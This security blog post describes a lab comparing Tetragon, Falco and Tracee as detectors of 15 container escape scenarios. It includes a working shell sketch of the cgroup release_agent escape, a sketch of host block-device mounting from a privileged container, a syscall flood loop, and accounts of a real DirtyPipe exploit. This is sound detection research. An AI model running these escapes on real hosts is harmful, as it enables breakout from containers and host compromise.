CatsCrdl

Daniel's thoughts on infosec

Container Escape Telemetry, Part 2: Methodology and Tool Architecture

The lab setup, scenario matrix, and tool comparison framework behind the container escape telemetry research. Three eBPF tools, 15 scenarios, one tool per VM, and a PowerShell harness that ties it all together.

Daniel Wyleczuk-Stern

16-Minute Read

This is Part 2 of the container escape telemetry series (overview). Part 1 covered the isolation primitives and eBPF observability model. This post covers the lab architecture, the three tools under test, the 15 escape scenarios, and the detection coverage matrix. If you want to skip straight to what the telemetry actually looks like, jump to Part 3: Per-Scenario Deep Dives.

The Lab

Each tool ran on its own dedicated Hyper-V VM: 3 GB RAM, 2 vCPUs, Ubuntu 22.04 on kernel 5.15.0-91-generic. One tool per VM. This was non-negotiable. eBPF programs from different tools will contend for the same kernel hooks, and if you’re trying to measure event ordering and timing, that contention corrupts your data. You can’t draw conclusions about “tool A generated event X before tool B generated event Y” if both tools are fighting over the same kprobe attachment points on the same kernel.

You might notice this entire setup runs on Windows with PowerShell and Hyper-V rather than a more typical Linux-native approach. The reason is mundane: my gaming PC has 48 GB of RAM, and computers are way too expensive these days to justify a dedicated lab machine. So Vagrant + Hyper-V it is.

Automation

A PowerShell harness (run.ps1) automated the full workflow per VM: reload the VM to apply kernel parameters, upload scenario scripts via SCP, install the assigned tool, execute all 15 scenarios through a bash harness that records start/end timestamps as JSONL markers, then download the results. Those markers are what let me correlate tool events to specific scenario windows. Each scenario runs between MARKER-S{N}-START and MARKER-S{N}-END marker containers, and every tool captures these container lifecycle events, giving me exact time boundaries to slice the telemetry.

The automation matters for reproducibility. Every run follows the same sequence, with the same sleep intervals, on a freshly reloaded VM. If I need to change a tool’s configuration and re-run, the harness guarantees the same scenario execution order and timing.
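To make the marker pattern concrete, here is a minimal sketch of the bash-side wrapper. The function name, the `results.jsonl` filename, and the busybox marker containers are illustrative, not the actual harness code:

```shell
#!/usr/bin/env bash
# Illustrative sketch of the marker pattern: bracket each scenario with
# short-lived marker containers (which every tool logs as container
# lifecycle events) and record JSONL timestamps for slicing telemetry.
run_scenario() {
  local n="$1" script="$2"
  docker run --rm --name "MARKER-S${n}-START" busybox true
  printf '{"scenario":"S%s","phase":"start","ts":"%s"}\n' \
    "$n" "$(date -u +%FT%T.%3NZ)" >> results.jsonl
  bash "$script" || true   # a failed technique is still data
  printf '{"scenario":"S%s","phase":"end","ts":"%s"}\n' \
    "$n" "$(date -u +%FT%T.%3NZ)" >> results.jsonl
  docker run --rm --name "MARKER-S${n}-END" busybox true
}
```

The JSONL lines give the analysis scripts wall-clock boundaries even if a tool misses the marker containers themselves.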

Why This Kernel

Kernel 5.15.0-91-generic was chosen deliberately, not by default. Several constraints intersected:

  • cgroup v1 is required for S01 and S02 (cgroup release_agent escapes). The VMs boot with systemd.unified_cgroup_hierarchy=0 to force cgroup v1.
  • CVE-2022-0492 (S02) is patched on this kernel – the unprivileged unshare-to-cgroup exploit path fails with EACCES. That’s intentional: S02 tests the CVE path, observes the failure, then falls back to a privileged release_agent escape. The failed attempt still generates telemetry (the EACCES return), and the fallback still succeeds because the container is privileged and cgroup v1 is available.
  • CVE-2022-0847 DirtyPipe (S08) requires a kernel in the 5.8-5.16.10 range to actually exploit. Kernel 5.15.0-91 is in that window, so S08 produces a real exploit – splice() actually corrupts the page cache and overwrites /etc/passwd. On a patched kernel, you’d still see the syscall pattern but not the actual escape. That real exploit is one of the most compelling data points in the whole series.
  • CVE-2022-0185 (S09) and CVE-2021-22555 (S10) are already patched on this kernel, so those run in PATTERN mode – the syscall sequence fires but the kernel rejects the exploit. That’s fine for telemetry analysis. The tool still sees every syscall; it just doesn’t result in privilege escalation.

A newer 6.x kernel would sacrifice the real DirtyPipe exploit. I aimed for real exploitation wherever possible in this project – pattern-only scenarios are useful, but watching splice() actually corrupt the page cache and overwrite /etc/passwd produces telemetry you can’t get any other way.
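Verifying that the cgroup v1 boot parameter actually took effect is worth automating. A minimal sketch (the helper name is mine, not the harness’s): the filesystem type mounted at /sys/fs/cgroup distinguishes v1, a tmpfs holding per-controller mounts, from v2, a single cgroup2fs.

```shell
# Report which cgroup hierarchy the VM booted into by inspecting the
# filesystem type at /sys/fs/cgroup (tmpfs => v1, cgroup2fs => v2).
cgroup_mode() {
  case "$(stat -fc %T /sys/fs/cgroup 2>/dev/null)" in
    cgroup2fs) echo "v2" ;;
    tmpfs)     echo "v1" ;;
    *)         echo "unknown" ;;
  esac
}
```

On the lab VMs this should print `v1`; if it prints `v2`, the `systemd.unified_cgroup_hierarchy=0` parameter didn’t apply and S01/S02 will fail for the wrong reason.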

Lab architecture: three isolated VMs, one tool each, driven by a PowerShell harness

The 15 Scenarios

The scenarios break into five categories. Each scenario is a self-contained shell script that creates its own container, runs the technique, checks for success, and cleans up. Result states: ESCAPED (technique worked), PATTERN (syscall sequence fired on a patched kernel), BLOCKED (kernel or runtime prevented the technique), ABUSED (dangerous capabilities exercised without crossing a namespace boundary), or TELEMETRY_TEST (stress test measuring tool reliability).

Misconfiguration-Based Escapes (S01-S05)

These work on any kernel version because they exploit configuration mistakes, not kernel vulnerabilities.

| ID | Technique | Result | What Happened |
|----|-----------|--------|---------------|
| S01 | cgroup release_agent | ESCAPED | Mounted cgroupfs v1, wrote release_agent, triggered host code execution |
| S02 | CVE-2022-0492 + fallback | ESCAPED | unshare to user/cgroup ns failed (patched), privileged fallback succeeded |
| S03 | nsenter --pid=host | ESCAPED | nsenter -t 1 -m -u -i -p joined all host namespaces |
| S04 | Docker socket mount | ESCAPED | Used mounted docker.sock to spawn container with host root filesystem |
| S05 | Host /proc access | ESCAPED | Read /proc/1/root, core_pattern, mountinfo, environ from privileged container |

S01 is the classic. Mount the cgroup filesystem, create a child cgroup, write to notify_on_release and release_agent, trigger it by writing to cgroup.procs. The host kernel executes your payload. S02 tries the same thing through the CVE-2022-0492 path first (unshare into new user + cgroup namespaces), fails because the kernel is patched, then falls back to the privileged container path. S03 is the simplest: nsenter -t 1 -m -u -i -p joins the host’s namespaces directly. S04 mounts the Docker socket and uses it to spawn a new container with the host filesystem. S05 reads sensitive files through the host’s /proc filesystem that a privileged container can access.

All five succeed. All five generate distinct telemetry signatures. The value of having all five is that they exercise different kernel mechanisms (mount, setns, socket_connect, file_open) and produce different event patterns across the three tools.
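The S01 mechanics described above condense into a few commands. This is a define-only sketch, not the actual scenario script – the controller choice, paths, and payload are illustrative, it assumes a privileged container on a cgroup v1 host, and it should only ever be invoked in a disposable lab VM:

```shell
# Define-only sketch of the cgroup v1 release_agent escape (S01-style).
# Illustrative paths and payload; assumes a privileged container.
s01_release_agent() {
  mkdir -p /tmp/cg
  mount -t cgroup -o memory cgroup /tmp/cg          # any v1 controller works
  mkdir -p /tmp/cg/x
  echo 1 > /tmp/cg/x/notify_on_release
  # The agent path is resolved on the HOST, so point it at this container's
  # filesystem as the host sees it (the overlayfs upperdir).
  host=$(sed -n 's/.*\bupperdir=\([^,]*\).*/\1/p' /etc/mtab | head -n1)
  echo "$host/payload" > /tmp/cg/release_agent
  printf '#!/bin/sh\nps aux > %s/output\n' "$host" > /payload
  chmod +x /payload
  # Put a short-lived task in the child cgroup; when it exits, the host
  # kernel executes release_agent with full host privileges.
  sh -c 'echo $$ > /tmp/cg/x/cgroup.procs'
}
```

Every step in that function is a distinct kernel-visible event (mount, cgroup_mkdir, file writes, host-side exec), which is why S01 lights up all three tools.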

Baseline Control (S06)

| ID | Technique | Result | What Happened |
|----|-----------|--------|---------------|
| S06 | Unprivileged container | NO ESCAPE | mount and unshare denied, no escape signals |

S06 runs a standard unprivileged container that performs normal operations: file reads, process spawning, network lookups. No escape attempt. This is the noise floor. Tetragon generated 1,127 events from its policy hooks, Falco generated 76, Tracee generated 29. Anything a real escape generates needs to be distinguishable from this baseline.

CVE-Based Exploits (S07-S12)

These generate the exploit syscall patterns. Some actually exploit the vulnerability (S08), some fire the pattern on a patched kernel (S09, S10), and some are blocked by the runtime (S11, S12).

| ID | CVE | Result | What Happened |
|----|-----|--------|---------------|
| S07 | CVE-2024-21626 (Leaky Vessels) | PATTERN | runc 1.1.11 WORKDIR /proc/self/fd/7; fd leak didn’t manifest in this environment |
| S08 | CVE-2022-0847 (DirtyPipe) | EXPLOITED | Real exploit: splice() overwrote /etc/passwd via page cache corruption |
| S09 | CVE-2022-0185 (fsconfig) | PATTERN | unshare(CLONE_NEWUSER), fsopen("ext4"), fsconfig(). Kernel patched. |
| S10 | CVE-2021-22555 (Netfilter) | PATTERN | unshare(USER\|NET), NETLINK_NETFILTER socket, raw socket creation |
| S11 | CVE-2025-31133 (maskedPaths) | BLOCKED | Symlinks to /proc/sysrq-trigger and core_pattern; writes blocked by read-only /proc |
| S12 | CVE-2019-5736 (runc overwrite) | BLOCKED | /proc/self/exe write returned ETXTBSY. Patched runc prevented overwrite. |

S07 and S12 use a helper script to swap in vulnerable runc versions (1.1.11 and 1.0.0-rc2) for the duration of the scenario, then restore the patched version afterward. S07’s fd leak didn’t manifest in our Docker/containerd version – the leaked file descriptor existed but pointed to a non-exploitable target – so the syscall pattern fires but the escape doesn’t complete. S08 is the standout: a real DirtyPipe exploit that corrupts the page cache via splice() and overwrites /etc/passwd with a root entry. The telemetry difference between “pattern on patched kernel” and “actual exploitation” turns out to matter a lot, and I’ll dig into that in Part 3.
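The runc swap helper reduces to a park-install-restore pattern. A sketch under my own naming (the function names and the `.bak` convention are hypothetical, not the actual helper script):

```shell
# Illustrative sketch of swapping in a vulnerable runc build for one
# scenario and restoring the patched binary afterward.
swap_runc() {
  local vuln="$1" real
  real=$(command -v runc) || return 1
  cp -p "$real" "${real}.bak"        # park the patched binary
  install -m 0755 "$vuln" "$real"    # install the vulnerable build
}
restore_runc() {
  local real
  real=$(command -v runc) || return 1
  [ -f "${real}.bak" ] && mv -f "${real}.bak" "$real"
}
```

Restoring immediately after the scenario matters: a forgotten vulnerable runc would contaminate every later scenario on that VM.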

Capability Abuse (S13-S14)

These came from reviewer feedback: “I would have loved if one of your scenarios was taking a privileged container that isn’t a straight break out.” Fair point. Not every dangerous container action crosses a namespace boundary. Sometimes the damage happens entirely within the container’s existing privileges.

| ID | Technique | Result | What Happened |
|----|-----------|--------|---------------|
| S13 | --privileged post-exploit | ABUSED | Mounted host block device, loaded kernel module, read /dev/kmsg, enumerated keyrings, accessed BPF subsystem |
| S14 | Excessive capabilities | ABUSED | Read /proc/1/environ and /proc/1/maps via CAP_SYS_PTRACE + --pid=host, raw sockets via CAP_NET_RAW, mounts via CAP_SYS_ADMIN |

S13 is the “someone ran --privileged because their eBPF tool told them to” scenario. The container gets all capabilities, all devices, no seccomp, no AppArmor. It doesn’t try to escape – it doesn’t need to. It mounts the host’s block device, loads a kernel module, reads the kernel log buffer, enumerates keyrings (which are not namespace-aware, so any container can read the root keyring), and loads an eBPF program. S14 is the subtler case: specific dangerous capabilities (CAP_SYS_PTRACE, CAP_NET_RAW, CAP_SYS_ADMIN) without full --privileged. Teams try to be granular but still over-grant.
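A define-only sketch of the S13 shape – no namespace boundary is crossed, yet every line exercises a host-impacting privilege. The specific command choices are illustrative, and this assumes a --privileged lab container:

```shell
# Define-only sketch of S13-style in-place privilege abuse.
# Illustrative commands; assumes a --privileged container in a lab.
s13_abuse() {
  keyctl show @s                       # keyrings are not namespace-aware
  head -c 512 /dev/kmsg                # read the host kernel log buffer
  dev=$(lsblk -ndo NAME | head -n1)    # first host block device
  mkdir -p /mnt/host && mount "/dev/$dev" /mnt/host
}
```

Nothing here resembles a textbook escape signature, which is precisely what makes S13 and S14 a useful test of the tools’ coverage.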

The key question these answer: if something has dangerous privileges and isn’t doing a textbook namespace escape, do these tools even notice?

Stress Test (S15)

| ID | Technique | Result | What Happened |
|----|-----------|--------|---------------|
| S15 | Syscall flood + concurrent escape | TELEMETRY_TEST | 7-phase flood measuring ring buffer resilience under adversarial load |

S15 answers the question from Part 1: can an attacker actually blind a security tool by flooding syscalls? Seven phases in two groups. Phases 1-3 flood getpid() at 1K, 100K, and 1M calls (unhooked – no tool generates events). Phases 4-5 and 7 flood openat(/dev/null) at 100K, 1M, and 10M calls (hooked – generates real ring buffer pressure). Phase 6 is the critical test: 1M openat flood running concurrently with an nsenter -t 1 -m -u -i -p escape. Can the tool see the escape during the flood?
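The hooked-syscall flood from phases 4-7 can be sketched in a few lines (function name is mine, not the scenario script’s): each loop iteration triggers one openat() on /dev/null, the syscall the tools hook, so the loop count directly controls ring buffer pressure.

```shell
# Minimal sketch of a hooked-syscall flood (the S15 phase 4-7 shape):
# every redirection below issues one openat() syscall.
flood_openat() {
  local n="$1" i=0
  while [ "$i" -lt "$n" ]; do
    : < /dev/null        # the redirection forces one openat() per iteration
    i=$((i + 1))
  done
  echo "completed $i openat calls"
}
```

The unhooked phases (getpid floods) are the control group: they generate syscall volume without touching any attachment point, so they should produce no events at all.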

The results were the most operationally significant finding in the research. I’ll cover them in detail in Part 4.

The Three Tools

Before diving into what each tool captured, it’s worth understanding why they produce such different telemetry from the same kernel events. The differences aren’t random. They flow directly from how each tool is architected.

Tetragon

Tetragon defines custom eBPF kprobes via TracingPolicy CRDs. For this research, I wrote 8 policies covering 31 kernel function hooks. The critical design choice is that filtering happens in the kernel: if an event doesn’t match a TracingPolicy, it never enters the ring buffer. Never reaches userspace. Never consumes buffer space.

Every event carries the full 10-namespace inode set with a host/container boolean, uid/gid/euid/egid/suid/sgid/fsuid/fsgid, complete permitted and effective capability sets (every capability listed by name), and full process ancestry up to the configured depth. A single Tetragon event averages ~14,600 bytes. That’s not bloat – it’s forensic self-sufficiency. Every event can be analyzed in complete isolation without correlating against external context.

The tradeoff is authoring cost. Tetragon ships with zero escape-detection policies. The TracingPolicy CRD system is powerful but empty. You’re writing kprobe YAML from scratch, specifying which kernel functions to hook, which arguments to capture, and which filters to apply. That authoring cost is real. But it means every event you get back is exactly the kernel function call you asked for, with the exact arguments you specified.
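To show what that authoring cost looks like, here is a minimal TracingPolicy of the kind the research required. This one hooks the setns syscall; the policy name and argument selections are illustrative, not one of the 8 actual research policies:

```yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: detect-setns        # illustrative, not one of the research policies
spec:
  kprobes:
    - call: "sys_setns"
      syscall: true
      args:
        - index: 0          # fd referring to the target namespace
          type: "int"
        - index: 1          # nstype flag (CLONE_NEWNS, CLONE_NEWPID, ...)
          type: "int"
```

Multiply this by 31 hooks across 8 policies, each with its own argument capture and in-kernel filters, and the gap between Tetragon’s power and its out-of-box coverage becomes tangible.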

Falco

Falco takes the opposite approach to coverage. It ships with 400+ community-maintained rules and its eBPF driver captures syscalls broadly, sending events to userspace where the Falco engine evaluates YAML rule conditions. Only rule-matched events are emitted as output. This means the barrier to getting started is low – install Falco, and you immediately have detection coverage for common container escape patterns.

Events carry container name, image, and ID via the container runtime socket, user info, and process ancestry up to a configurable depth. Each event averages ~3,500 bytes. Falco doesn’t provide raw namespace inodes, which limits certain types of forensic correlation. You know a namespace change happened, but you can’t programmatically prove which specific namespace transitioned by comparing inode values.

One important caveat: Falco’s default ruleset detected only 5 of 13 scoreable scenarios (S01-S14, excluding S06 baseline and S15 stress test). I wrote twelve additional custom rules targeting CVE-specific syscalls and capability abuse patterns, and enabled rule_matching=all so overlapping rules fire on the same event. The gaps were entirely configuration-driven, not engine limitations. I’ll cover this in detail in a later post, because it’s one of the most actionable findings from the research.
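For a sense of what those additions look like, here is a hypothetical custom rule in the same shape – not one of the twelve actual rules:

```yaml
- rule: Cgroup Release Agent Modified
  desc: >
    Detect writes to a cgroup v1 release_agent file from inside a
    container (hypothetical example, not one of the research rules)
  condition: >
    open_write and container and fd.name endswith "release_agent"
  output: >
    release_agent written (proc=%proc.name file=%fd.name
    container=%container.name image=%container.image.repository)
  priority: CRITICAL
  tags: [container_escape, cgroup]
```

The engine evaluates conditions like this in userspace against every captured syscall, which is why rule authoring in Falco is cheap relative to Tetragon’s kernel-side policy authoring.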

Tracee

Tracee sits in an interesting middle ground. It attaches eBPF tracepoints to 330+ syscalls and runs a behavioral signature engine (the TRC-* signatures) on top. This gives it two telemetry layers: raw syscall capture and derived behavioral events. Each event averages ~1,400 bytes – the most compact of the three tools.

Its standout capabilities are magic_write and commit_creds. magic_write fires when file content changes through a mechanism that bypasses normal write permissions – which is exactly what page cache corruption does. commit_creds captures the actual kernel credential struct transition, showing old and new uid/gid/capability sets. These are synthesized observations, not raw syscalls. They detect exploit consequences rather than specific syscall sequences, which makes them more resilient to exploit variations. If the next kernel CVE uses a completely different syscall chain to corrupt page cache or escalate credentials, magic_write and commit_creds will still fire. A tool that only matches specific syscall patterns won’t.

The tradeoff is that Tracee’s broad hook coverage creates a larger attack surface for ring buffer flooding. With 30 event types in our policy (and 330+ in its default set), an attacker has many possible syscalls to flood. This is manageable with proper policy tuning – particularly path-filtering security_file_open – but it requires understanding which events are high-frequency and scoping them appropriately. I’ll cover the S15 stress test results and what they mean for Tracee deployments in Part 4.

Architecture Comparison

| Dimension | Tetragon | Falco | Tracee |
|-----------|----------|-------|--------|
| Collection method | Custom kprobes via TracingPolicy | eBPF syscall driver + rule engine | eBPF tracepoints + behavioral signatures |
| Where filtering happens | In-kernel BPF | Userspace rule engine | In-kernel + userspace behavioral |
| Namespace context | Full 10-ns inode set + is_host | Container name/image/id, no raw inodes | mountNs + pidNs inodes, container metadata |
| Credential detail | Full uid/gid/euid + capability sets | user.uid, cap_effective, cap_permitted | userId, commit_creds old/new structs |
| Process ancestry | Full tree with binary paths + args | proc.aname[N] up to configurable depth | hostParentProcessId chain, parentEntityId |
| Enforcement | In-kernel SIGKILL or syscall return override | Alert only | Alert only |
| Avg event size | ~14,600 bytes | ~3,500 bytes | ~1,400 bytes |
| Default detection coverage | None (author your own policies) | 400+ community rules | 330+ syscall hooks + TRC-* behavioral sigs |

The “where filtering happens” row is the single most important architectural distinction for understanding the tools’ behavior under load. Tetragon’s in-kernel filtering means irrelevant events never consume buffer space. Falco’s userspace filtering means all syscalls hit the buffer, but the rule engine decides what to emit. Tracee’s model is somewhere between: its eBPF programs do per-event-type filtering in-kernel, but event-type prioritization under buffer pressure is not implemented. That distinction drives the S15 results.

Detection Coverage

The table below shows which tools generated escape-specific telemetry for each scenario. I’m not counting generic process lifecycle events – only signals that actually indicate the escape technique was used. The Falco column reflects the final state after my twelve custom rule additions. S15 is a stress test, not an escape scenario, so it’s scored separately.

Legend: ✓ = detected the escape technique, ✗ = missed, △ = partial detection (tool saw related activity but not the core escape mechanism – counts as detected in scoring since it would trigger investigation).

| Scenario | Technique | Tetragon | Falco | Tracee |
|----------|-----------|----------|-------|--------|
| S01 | cgroup release_agent | ✓ mount + cgroup_mkdir + file_open | ✓ release_agent write | ✓ mount + magic_write |
| S02 | CVE-2022-0492 + fallback | ✓ unshare + mount + task_alloc | ✓ release_agent + ns change | ✓ switch_task_ns + magic_write |
| S03 | nsenter | ✓ setns() x4 with ns type flags | ✓ Namespace Change x5 + Nsenter Execution | ✓ setns x4 + switch_task_ns x4 |
| S04 | Docker socket | ✓ socket_connect to docker.sock | △ Docker Socket Access (runc init only) | ✓ security_socket_connect x5 |
| S05 | Host /proc | ✓ file_open on /proc/1/root/*, core_pattern | ✓ Sensitive Host File Read x3 | ✓ security_file_open |
| S07 | Leaky Vessels | ✗ No fd-leak hook | ✗ No fd-leak rule | ✗ No fd-leak signature |
| S08 | DirtyPipe | ✓ splice/do_splice with file paths | ✓ splice (custom rule) | ✓ splice + 961 magic_write |
| S09 | fsconfig | ✓ fsopen + fsconfig + cap_capable | ✓ fsconfig (custom rule) | ✓ unshare + commit_creds |
| S10 | Netfilter | ✓ setsockopt + unshare | ✓ netlink socket (custom rule) | ✓ unshare + commit_creds + setsockopt |
| S11 | maskedPaths | ✓ symlink() x2 to /proc targets | ✓ symlink (custom rule) | ✓ symlink x2 |
| S12 | runc overwrite | ✓ bprm_check + file_open /proc/self/exe | ✗ Write blocked before observation | △* openat(/proc/self/exe) ret=ETXTBSY |
| S13 | Privileged post-exploit | ✓ mount + keyctl + security_file_open | ✓ Keyctl + Kernel Log + Mount + Raw Socket | ✓ mount + security_file_open + keyctl + commit_creds |
| S14 | Excessive capabilities | ✓ mount + keyctl + security_file_open | ✓ Host Environ + Host Maps + Mount + Packet socket | ✓ security_file_open + mount + tcpdump exec |

The △* for Tracee on S12 indicates that the detection requires the openat event to be explicitly enabled in the policy; it is not in Tracee’s default event set.

Detection Scores (S01-S14 escape scenarios only; S15 is a stress test; △ counts as detected, △* does not in the base score):

| Tool | Real-Time Detection |
|------|---------------------|
| Tetragon | 12/13 |
| Tracee | 11/13 (12/13 with the openat event enabled) |
| Falco | 11/13 (5/13 before custom rules) |

What the Scores Don’t Tell You

The aggregate scores are useful for a quick comparison, but they flatten out qualitative differences that matter enormously in practice. A checkmark in the detection column doesn’t tell you:

  • What context the event carries. Tetragon’s setns() events include before/after namespace inode pairs with type flags decoded. Falco’s “Namespace Change” alert tells you it happened but not which namespaces transitioned. Both get a checkmark, but one gives you forensic evidence and the other gives you a detection.

  • Whether the detection required custom work. Falco’s 11/13 includes 6 scenarios that only work because I wrote custom rules (the other 5 use default rules). Tetragon ships with zero escape-detection policies, so all 12 detections required custom TracingPolicies. Tracee’s 11/13 includes behavioral signatures that ship by default. The out-of-box experience is very different.

  • How the tool handles the scenario it missed. All three tools miss S07 (Leaky Vessels). But the reason is the same for all of them: the fd-leak attack doesn’t produce a distinctive syscall pattern that can be hooked. The WORKDIR during docker build just looks like a normal process with an unusual working directory. This is a fundamentally hard detection problem, not a tool limitation.

The S06 baseline is important context for everything that follows. It shows what “normal” telemetry looks like from an unprivileged container where mount and unshare are both denied. Tetragon generated 1,127 events from its policy hooks with zero escape-specific signals. This is the noise floor against which everything else should be compared. If your detection can’t distinguish escape activity from that baseline, it’s not a useful detection.

What Comes Next

With the lab, tools, and coverage matrix established, Part 3 digs into the per-scenario telemetry: what each tool actually captured, what the events look like, and what patterns emerge when you compare the raw data across tools. That’s where the qualitative differences behind the checkmarks become concrete.

If you’re more interested in operational questions – how much data do these tools generate, what does the signal-to-noise look like, and which tool should you actually deploy – skip to Part 4.

The full scenario scripts, Tetragon policies, Falco rules, and automation harness are available in the research repository.

